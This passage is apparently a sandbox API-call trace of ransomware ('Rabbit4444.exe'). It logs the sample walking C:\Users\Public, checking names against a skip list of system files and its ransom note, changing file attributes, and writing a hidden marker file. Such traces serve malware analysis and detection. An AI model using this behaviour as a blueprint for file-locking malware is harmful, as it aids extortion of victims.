0xff6f8 [0047.909] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6670 | out: ListHead=0xf68b0, ListEntry=0xf6670) returned 0xf6610 [0047.910] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x475e19ed, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475e19ed, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0047.910] lstrcmpiW (lpString1="Public", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.910] lstrcmpiW (lpString1="Public", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.910] lstrcmpiW (lpString1="Public", lpString2="Rabbit4444.exe") returned -1 [0047.910] lstrcmpiW (lpString1="Public", lpString2=".") returned 1 [0047.910] lstrcmpiW (lpString1="Public", lpString2="..") returned 1 [0047.910] lstrcmpiW (lpString1="Public", lpString2="windows") returned -1 [0047.910] lstrcmpiW (lpString1="Public", lpString2="bootmgr") returned 1 [0047.910] lstrcmpiW (lpString1="Public", lpString2="pagefile.sys") returned 1 [0047.910] lstrcmpiW (lpString1="Public", lpString2="boot") returned 1 [0047.910] lstrcmpiW (lpString1="Public", lpString2="ids.txt") returned 1 [0047.910] lstrcmpiW (lpString1="Public", lpString2="NTUSER.DAT") returned 1 [0047.910] lstrcpyW (in: lpString1=0x130eb4a, lpString2="Public" | out: lpString1="Public") returned="Public" [0047.910] SetFileAttributesW (lpFileName="C:\\Users\\Public", dwFileAttributes=0x10) returned 1 [0047.910] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6488 [0047.910] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x20) returned 0xff798 [0047.910] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6490 | out: ListHead=0xf68b0, ListEntry=0xf6490) returned 0xf6670 [0047.910] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x475e19ed, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475e19ed, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0047.910] FindClose (in: hFindFile=0x1025d0 | out: hFindFile=0x1025d0) returned 1 [0047.910] lstrcpyW (in: lpString1=0x130eb4a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0047.910] CreateFileW (lpFileName="C:\\Users\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0047.911] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0047.911] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0047.911] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.912] CloseHandle (hObject=0x278) returned 1 [0047.912] CloseHandle (hObject=0x27c) returned 1 [0047.912] GetCurrentThreadId () returned 0xd98 [0047.912] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6490 [0047.912] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\Public", iMaxLength=2048 | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0047.912] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xff798 | out: hHeap=0xe0000) returned 1 [0047.912] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6488 | out: hHeap=0xe0000) returned 1 [0047.913] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0047.913] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0047.913] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Public\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Public\\.BFC0E91B00AE8A0620D3" [0047.913] CreateFileW (lpFileName="C:\\Users\\Public\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\public\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0047.914] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0047.916] FlushFileBuffers (hFile=0x27c) returned 1 [0047.917] SetFileAttributesW (lpFileName="C:\\Users\\Public\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0047.917] CloseHandle (hObject=0x27c) returned 1 [0047.919] lstrlenW (lpString="C:\\Users\\Public") returned 15 [0047.919] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0047.919] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x475e19ed, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xe5e18a1e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0047.919] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.919] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.919] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0047.919] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0047.920] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x475e19ed, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xe5e18a1e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.920] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.920] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.920] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0047.920] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0047.920] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0047.920] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe5e18a1e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe5e18a1e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe5e18a1e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0047.920] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.920] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0047.920] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x3079b77, ftCreationTime.dwHighDateTime=0x1d1a050, ftLastAccessTime.dwLowDateTime=0xce317778, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AccountPictures", cAlternateFileName="ACCOUN~1")) returned 1 [0047.920] lstrcmpiW (lpString1="AccountPictures", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.920] lstrcmpiW (lpString1="AccountPictures", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.920] lstrcmpiW (lpString1="AccountPictures", lpString2="Rabbit4444.exe") returned -1 [0047.920] lstrcmpiW (lpString1="AccountPictures", lpString2=".") returned 1 [0047.920] lstrcmpiW (lpString1="AccountPictures", lpString2="..") returned 1 [0047.920] lstrcmpiW (lpString1="AccountPictures", lpString2="windows") returned -1 [0047.920] lstrcmpiW (lpString1="AccountPictures", lpString2="bootmgr") returned -1 [0047.920] lstrcmpiW (lpString1="AccountPictures", lpString2="pagefile.sys") returned -1 [0047.920] lstrcmpiW (lpString1="AccountPictures", lpString2="boot") returned -1 [0047.920] lstrcmpiW (lpString1="AccountPictures", lpString2="ids.txt") returned -1 [0047.920] lstrcmpiW (lpString1="AccountPictures", lpString2="NTUSER.DAT") returned -1 [0047.920] lstrcpyW (in: lpString1=0x130eb58, lpString2="AccountPictures" | out: lpString1="AccountPictures") returned="AccountPictures" [0047.920] SetFileAttributesW (lpFileName="C:\\Users\\Public\\AccountPictures", dwFileAttributes=0x12) returned 1 [0047.921] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6348 [0047.921] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x40) returned 0x114c10 [0047.921] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6350 | out: ListHead=0xf68b0, ListEntry=0xf6350) returned 0xf6670 [0047.921] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe4c3ce2c, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe4c3ce2c, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0047.921] lstrcmpiW (lpString1="Desktop", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.921] lstrcmpiW (lpString1="Desktop", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.921] lstrcmpiW (lpString1="Desktop", lpString2="Rabbit4444.exe") returned -1 [0047.921] lstrcmpiW (lpString1="Desktop", lpString2=".") returned 1 [0047.921] lstrcmpiW (lpString1="Desktop", lpString2="..") returned 1 [0047.921] lstrcmpiW (lpString1="Desktop", lpString2="windows") returned -1 [0047.921] lstrcmpiW (lpString1="Desktop", lpString2="bootmgr") returned 1 [0047.921] lstrcmpiW (lpString1="Desktop", lpString2="pagefile.sys") returned -1 [0047.921] lstrcmpiW (lpString1="Desktop", lpString2="boot") returned 1 [0047.921] lstrcmpiW (lpString1="Desktop", lpString2="ids.txt") returned -1 [0047.922] lstrcmpiW (lpString1="Desktop", lpString2="NTUSER.DAT") returned -1 [0047.922] lstrcpyW (in: lpString1=0x130eb58, lpString2="Desktop" | out: lpString1="Desktop") returned="Desktop" [0047.922] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Desktop", dwFileAttributes=0x12) returned 1 [0047.922] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6568 [0047.922] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x30) returned 0xf75d8 [0047.922] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6570 | out: ListHead=0xf68b0, ListEntry=0xf6570) returned 0xf6350 [0047.922] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa08e58, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fb62ca, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0047.922] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.922] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.922] lstrcmpiW (lpString1="desktop.ini", lpString2="Rabbit4444.exe") returned -1 [0047.922] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0047.922] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0047.922] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0047.922] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0047.922] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0047.922] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0047.922] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0047.922] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0047.922] lstrcpyW (in: lpString1=0x130eb58, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0047.922] SetFileAttributesW (lpFileName="C:\\Users\\Public\\desktop.ini", dwFileAttributes=0x22) returned 1 [0047.922] SetFileAttributesW (lpFileName="C:\\Users\\Public\\desktop.ini", dwFileAttributes=0x6) returned 1 [0047.923] lstrlenW (lpString="desktop.ini") returned 11 [0047.923] lstrlenW (lpString="Rabbit4444") returned 10 [0047.923] lstrcmpiW (lpString1="esktop.ini", lpString2="Rabbit4444") returned -1 [0047.923] lstrlenW (lpString=".dll") returned 4 [0047.923] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0047.923] lstrlenW (lpString=".lnk") returned 4 [0047.923] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0047.923] lstrlenW (lpString=".ini") returned 4 [0047.923] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0047.923] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb1fb672c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb1fb672c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0047.923] lstrcmpiW (lpString1="Documents", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.923] lstrcmpiW (lpString1="Documents", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.923] lstrcmpiW (lpString1="Documents", lpString2="Rabbit4444.exe") returned -1 [0047.923] lstrcmpiW (lpString1="Documents", lpString2=".") returned 1 [0047.923] lstrcmpiW (lpString1="Documents", lpString2="..") returned 1 [0047.923] lstrcmpiW (lpString1="Documents", lpString2="windows") returned -1 [0047.923] lstrcmpiW (lpString1="Documents", lpString2="bootmgr") returned 1 [0047.923] lstrcmpiW (lpString1="Documents", lpString2="pagefile.sys") returned -1 [0047.923] lstrcmpiW (lpString1="Documents", lpString2="boot") returned 1 [0047.923] lstrcmpiW (lpString1="Documents", lpString2="ids.txt") returned -1 [0047.923] lstrcmpiW (lpString1="Documents", lpString2="NTUSER.DAT") returned -1 [0047.923] lstrcpyW (in: lpString1=0x130eb58, lpString2="Documents" | out: lpString1="Documents") returned="Documents" [0047.923] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents", dwFileAttributes=0x10) returned 1 [0047.923] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6368 [0047.924] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x34) returned 0x102510 [0047.924] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6370 | out: ListHead=0xf68b0, ListEntry=0xf6370) returned 0xf6570 [0047.924] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466cad2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0047.924] lstrcmpiW (lpString1="Downloads", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.924] lstrcmpiW (lpString1="Downloads", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.924] lstrcmpiW (lpString1="Downloads", lpString2="Rabbit4444.exe") returned -1 [0047.924] lstrcmpiW (lpString1="Downloads", lpString2=".") returned 1 [0047.924] lstrcmpiW (lpString1="Downloads", lpString2="..") returned 1 [0047.924] lstrcmpiW (lpString1="Downloads", lpString2="windows") returned -1 [0047.924] lstrcmpiW (lpString1="Downloads", lpString2="bootmgr") returned 1 [0047.924] lstrcmpiW (lpString1="Downloads", lpString2="pagefile.sys") returned -1 [0047.924] lstrcmpiW (lpString1="Downloads", lpString2="boot") returned 1 [0047.924] lstrcmpiW (lpString1="Downloads", lpString2="ids.txt") returned -1 [0047.924] lstrcmpiW (lpString1="Downloads", lpString2="NTUSER.DAT") returned -1 [0047.924] lstrcpyW (in: lpString1=0x130eb58, lpString2="Downloads" | out: lpString1="Downloads") returned="Downloads" [0047.924] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Downloads", dwFileAttributes=0x10) returned 1 [0047.924] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6588 [0047.924] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x34) returned 0x102750 [0047.924] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6590 | out: ListHead=0xf68b0, ListEntry=0xf6590) returned 0xf6370 [0047.924] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb207547d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb207547d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0047.924] lstrcmpiW (lpString1="Libraries", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.924] lstrcmpiW (lpString1="Libraries", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.924] lstrcmpiW (lpString1="Libraries", lpString2="Rabbit4444.exe") returned -1 [0047.924] lstrcmpiW (lpString1="Libraries", lpString2=".") returned 1 [0047.924] lstrcmpiW (lpString1="Libraries", lpString2="..") returned 1 [0047.924] lstrcmpiW (lpString1="Libraries", lpString2="windows") returned -1 [0047.925] lstrcmpiW (lpString1="Libraries", lpString2="bootmgr") returned 1 [0047.925] lstrcmpiW (lpString1="Libraries", lpString2="pagefile.sys") returned -1 [0047.925] lstrcmpiW (lpString1="Libraries", lpString2="boot") returned 1 [0047.925] lstrcmpiW (lpString1="Libraries", lpString2="ids.txt") returned 1 [0047.925] lstrcmpiW (lpString1="Libraries", lpString2="NTUSER.DAT") returned -1 [0047.925] lstrcpyW (in: lpString1=0x130eb58, lpString2="Libraries" | out: lpString1="Libraries") returned="Libraries" [0047.925] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Libraries", dwFileAttributes=0x12) returned 1 [0047.925] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6388 [0047.925] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x34) returned 0x102590 [0047.925] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6390 | out: ListHead=0xf68b0, ListEntry=0xf6390) returned 0xf6590 [0047.925] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466d9b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0047.925] lstrcmpiW (lpString1="Music", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.925] lstrcmpiW (lpString1="Music", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.925] lstrcmpiW (lpString1="Music", lpString2="Rabbit4444.exe") returned -1 [0047.925] lstrcmpiW (lpString1="Music", lpString2=".") returned 1 [0047.925] lstrcmpiW (lpString1="Music", lpString2="..") returned 1 [0047.925] lstrcmpiW (lpString1="Music", lpString2="windows") returned -1 [0047.925] lstrcmpiW (lpString1="Music", lpString2="bootmgr") returned 1 [0047.925] lstrcmpiW (lpString1="Music", lpString2="pagefile.sys") returned -1 [0047.925] lstrcmpiW (lpString1="Music", lpString2="boot") returned 1 [0047.925] lstrcmpiW (lpString1="Music", lpString2="ids.txt") returned 1 [0047.925] lstrcmpiW (lpString1="Music", lpString2="NTUSER.DAT") returned -1 [0047.925] lstrcpyW (in: lpString1=0x130eb58, lpString2="Music" | out: lpString1="Music") returned="Music" [0047.925] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Music", dwFileAttributes=0x10) returned 1 [0047.926] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf63a8 [0047.926] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x2c) returned 0xf7bc0 [0047.926] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf63b0 | out: ListHead=0xf68b0, ListEntry=0xf63b0) returned 0xf6390 [0047.926] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466e1ef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0047.926] lstrcmpiW (lpString1="Pictures", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.926] lstrcmpiW (lpString1="Pictures", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.926] lstrcmpiW (lpString1="Pictures", lpString2="Rabbit4444.exe") returned -1 [0047.926] lstrcmpiW (lpString1="Pictures", lpString2=".") returned 1 [0047.926] lstrcmpiW (lpString1="Pictures", lpString2="..") returned 1 [0047.926] lstrcmpiW (lpString1="Pictures", lpString2="windows") returned -1 [0047.926] lstrcmpiW (lpString1="Pictures", lpString2="bootmgr") returned 1 [0047.926] lstrcmpiW (lpString1="Pictures", lpString2="pagefile.sys") returned 1 [0047.926] lstrcmpiW (lpString1="Pictures", lpString2="boot") returned 1 [0047.926] lstrcmpiW (lpString1="Pictures", lpString2="ids.txt") returned 1 [0047.926] lstrcmpiW (lpString1="Pictures", lpString2="NTUSER.DAT") returned 1 [0047.926] lstrcpyW (in: lpString1=0x130eb58, lpString2="Pictures" | out: lpString1="Pictures") returned="Pictures" [0047.926] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures", dwFileAttributes=0x10) returned 1 [0047.926] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6448 [0047.926] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x32) returned 0x102a90 [0047.926] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6450 | out: ListHead=0xf68b0, ListEntry=0xf6450) returned 0xf63b0 [0047.926] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466eabf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0047.926] lstrcmpiW (lpString1="Videos", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.926] lstrcmpiW (lpString1="Videos", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.926] lstrcmpiW (lpString1="Videos", lpString2="Rabbit4444.exe") returned 1 [0047.926] lstrcmpiW (lpString1="Videos", lpString2=".") returned 1 [0047.926] lstrcmpiW (lpString1="Videos", lpString2="..") returned 1 [0047.926] lstrcmpiW (lpString1="Videos", lpString2="windows") returned -1 [0047.926] lstrcmpiW (lpString1="Videos", lpString2="bootmgr") returned 1 [0047.927] lstrcmpiW (lpString1="Videos", lpString2="pagefile.sys") returned 1 [0047.927] lstrcmpiW (lpString1="Videos", lpString2="boot") returned 1 [0047.927] lstrcmpiW (lpString1="Videos", lpString2="ids.txt") returned 1 [0047.927] lstrcmpiW (lpString1="Videos", lpString2="NTUSER.DAT") returned 1 [0047.927] lstrcpyW (in: lpString1=0x130eb58, lpString2="Videos" | out: lpString1="Videos") returned="Videos" [0047.927] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Videos", dwFileAttributes=0x10) returned 1 [0047.927] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf63e8 [0047.927] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x2e) returned 0xf74f8 [0047.927] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf63f0 | out: ListHead=0xf68b0, ListEntry=0xf63f0) returned 0xf6450 [0047.927] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466eabf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, 